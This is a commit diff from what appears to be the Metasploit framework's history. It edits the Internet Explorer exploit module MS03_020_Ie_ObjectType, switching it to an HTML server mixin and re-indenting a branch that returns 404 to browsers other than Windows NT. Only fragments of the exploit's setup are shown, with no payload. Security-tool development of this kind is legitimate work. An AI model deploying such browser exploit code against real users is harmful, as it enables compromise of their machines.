its really an html exploit...

git-svn-id: file:///home/svn/incoming/trunk@3484 4d416f70-5f16-0410-b530-b9f4589650da
unstable
bmc 2006-01-30 22:12:17 +00:00
parent 8d2582dffa
commit 7f270f55b0
1 changed files with 4 additions and 6 deletions

View File

@ -4,7 +4,7 @@ module Msf
class Exploits::Windows::Browser::MS03_020_Ie_ObjectType < Msf::Exploit::Remote
include Exploit::Remote::HttpServer
include Exploit::Remote::HttpServer::Html
include Exploit::Remote::Egghunter
def initialize(info = {})
@ -62,11 +62,9 @@ class Exploits::Windows::Browser::MS03_020_Ie_ObjectType < Msf::Exploit::Remote
when /Windows NT/
ret = target['Rets'][0]
else
print_status("Sending 404 to user agent: #{request['User-Agent']}")
cli.send_response(create_response(404, 'File not found'))
return
print_status("Sending 404 to user agent: #{request['User-Agent']}")
cli.send_response(create_response(404, 'File not found'))
return
end
# Re-generate the payload